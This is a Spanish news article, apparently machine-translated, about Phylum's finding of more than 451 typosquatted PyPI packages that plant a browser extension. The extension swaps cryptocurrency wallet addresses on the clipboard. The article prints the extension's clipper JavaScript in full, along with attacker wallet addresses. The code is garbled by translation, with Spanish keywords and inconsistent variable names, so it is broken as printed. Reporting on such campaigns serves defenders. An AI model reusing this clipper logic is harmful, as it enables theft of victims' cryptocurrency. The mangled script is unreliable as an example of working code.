Clipper malware encontrado en más de 451 paquetes PyPI

Los investigadores de seguridad de Phylum han descubierto más de 451 paquetes en el índice de paquetes de Python (PyPI) que están infectados con el malware “clipper”. Clippers reemplaza el contenido del portapapeles de una víctima con algo que beneficia al atacante. Los clippers más frecuentes hoy en día buscan direcciones de criptomonedas y las modifican para robar fondos. A partir del 9 de febrero, Phylum fue alertado por su plataforma automatizada de detección de riesgos sobre una larga serie de publicaciones sospechosas en PyPI. Los investigadores notaron que se parecía a una campaña anterior descubierta en noviembre de 2022 pero con una técnica de ofuscación actualizada y un volumen “radicalmente aumentado”. En la campaña anterior, los atacantes publicaron poco más de dos docenas de paquetes. Esta vez, hay más de 451 paquetes únicos. “Este atacante aumentó significativamente su huella en pypi a través de la automatización”, explicó Phylum. Ambas campañas aprovechan el error tipográfico, es decir, un simple error tipográfico en la dirección de un paquete legítimo, para que los desarrolladores instalen versiones maliciosas. En este caso, se crea una extensión de navegador Chromium que se carga automáticamente al iniciar cualquiera de los navegadores objetivo, incluidos Chrome, Edge, Brave y Opera, utilizando el interruptor de línea de comando ‘–load-extension’. Luego, se escribe el siguiente JavaScript en la extensión que tiene como objetivo reemplazar las direcciones criptográficas con las controladas por el atacante:

dejar página = chrome.extension.getBackgroundPage(); var inputElement = document.createElement(‘input’); documento.cuerpo.appendChild(elemento de entrada); elemento de entrada.focus(); function verificarWalletAddresses() { document.execCommand(‘pegar’); var portapapelesContenido = inputElement.value; contenido del portapapeles = contenido del portapapeles.replace(/^(0x)[A-Fa-f0-9]{40}$/g, ‘0x6eb2103839011Ed56c98145b3d3f9d6BE1b4dA63’); contenido del portapapeles = contenido del portapapeles.replace(/^T[A-Za-z1-9]{33}$/g, ‘TK3dtT7vYLkhUyzLqbQMmsrM36QzFnmfaa’); contenido del portapapeles = contenido del portapapeles.replace(/^(bnb1)[0-9a-z]{38}$/g, ‘bnb1pncs5ct0rdh3rcdms8708x9jrdy038ml33ceuw’); contenidodelportapapeles = contenidodelportapapeles.reemplazar(/^([13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})$/g, ‘bc1qkjm7r677a4fkxcmx9kzlk55a9eaqtztq8zwrc2’); contenidodelportapapeles = contenidodelportapapeles.reemplazar(/^[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}$/g, ‘LcVct9KwHwUKftDNjbBxUtjK9WeUkYbRN3’); contenidodelportapapeles = contenidodelportapapeles.replace(/^r[0-9a-zA-Z]{24,34}$/g, ‘rJd2pxs7TxE77W8X3Ezt2QyrhMJixMehPx’); contenido del portapapeles = contenido del portapapeles.replace(/^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$/g, ‘DFbEVJUt9TcyBgVGriy3DcNBwYhK3s7Yhx’); contenido del portapapeles = contenido del portapapeles.replace(/^addr1[a-z0-9]+$/g, ‘addr1q8206rrze22rz8g5lggn4clv7zu9mq6w6a6llvw8v3l7r8k5l5xx9j55xyw3f7s38t37eu9ctkp5a4m4l7cuwerlux0qxlhwvz’); contenidodelportapapeles = contenidodelportapapeles.reemplazar(/^[48]([0-9AB]{1})([0-9a-zA-Z]{93})$/g, ’41iwYzbS1KKX8DFySxDcGBGGfJzywUeHxWumm4fjYxtYCiHtysXmq3P7RqG18Tv5UDKGNQegefxS2FFqrqeapvB7FuYSBJv’); contenidodelportapapeles = contenidodelportapapeles.reemplazar(/^G[0-7A-Za-z]{55}$/g, ‘GCUPRZDN5RGSO3MC4LBIZBJMCS5KNUYQI2HZNUHVEBC5LNWZODWQ24XH’); \tclipboardContent = clipboardContent.replace(/^cosmos[a-z0-9]{39}$/g, ‘cosmos1cd3hxdkc775zj75xtd3gqp8s7hynxkzewcf58y’); inputElement.value = contenido del portapapeles; elemento de entrada.select(); documento.execCommand(‘copiar’); elemento de entrada.valor = ”; } setInterval(checkWalletAddresses, 1000);

Puede encontrar el desglose completo de la campaña de Phylum y la lista de los paquetes descubiertos aquí. (Foto de Agence Olloweb en Unsplash)

¿Quiere aprender más sobre ciberseguridad y la nube de los líderes de la industria? Eche un vistazo a Cyber ​​Security & Cloud Expo que tendrá lugar en Ámsterdam, California y Londres. Explore otros próximos eventos y seminarios web de tecnología empresarial impulsados ​​por TechForge aquí. Etiquetas: clipper, ciberseguridad, ciberseguridad, malware, pypi, python, seguridad